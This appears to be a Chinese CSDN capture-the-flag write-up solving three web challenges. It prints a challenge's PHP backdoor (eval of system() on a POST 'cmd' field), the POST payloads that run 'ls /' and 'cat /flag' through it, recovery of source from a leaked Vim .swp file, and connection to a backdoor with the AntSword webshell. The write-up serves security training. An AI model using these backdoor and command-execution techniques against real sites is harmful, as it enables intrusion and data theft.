[LitCTF 2023]PHP是世界上最好的语言!!、 [LitCTF 2023]Vim yyds、 [羊城杯 2020]easycon

文章讲述了在LitCTF2023中PHP语言的使用,涉及无参脚本执行、系统调用获取flag,以及Vim编辑器的.swp文件泄露和后门利用。羊城杯2020的easycon环节也揭示了存在可利用的POST后门获取flag。
摘要由CSDN通过智能技术生成

目录

[LitCTF 2023]PHP是世界上最好的语言!!

 [LitCTF 2023]Vim yyds

 [羊城杯 2020]easycon


[LitCTF 2023]PHP是世界上最好的语言!!

无参,根据题目提示看看php能否执行——返回1执行成功

用system()函数调用、执行ls /命令,查看根目录

发现存在flag,cat查看flag文件 得到flag

 [LitCTF 2023]Vim yyds

 .swp 文件

.swp 文件一般是 vim 编辑器在编辑文件时产生的,当用 vim 编辑器编辑文件时就会产生,正常退出时 .swp 文件被删除,但是如果直接叉掉(非正常退出),那么 .swp 文件就会被保留

.vim泄露

关于.vim泄露可见信息泄露(ctfhub)-CSDN博客

题目提示了vim泄露 源码泄露,使用dirsearch扫描,找到200的可以访问路径,下载url/.index.php.swp


 Vim编译器是Linux操作系统,将文件index.php.swp传入kali,用vim打开文件

部分代码

<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
    echo "<p>Oh You got my password!</p>";
    eval(system($_POST['cmd']));
}
?>

发现   password = "Give_Me_Your_Flag"

POST 传参了password=字符串 “Give_Me_Your_Flag” base64 加密后的值

POST 传参了cmd

两个参数用拼接符&连接起来

eval()函数把字符串按照PHP代码来计算

查看根目录

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=ls /

查看flag

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

 [羊城杯 2020]easycon

打开环境,没发现什么信息,用dirsearch扫描一下

返回结果中发现存在 index.php 页面,在URL访问,有个弹窗(POST传参了cmd,说明该页面存在后门

 接着跳转到了这个图片页面

POST传参了cmd,说明该页面存在后门,于是用蚁剑连接

在根目录下发现一个 bbbbbbbbb.txt 文件

 下载后打开是base64,转图片得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值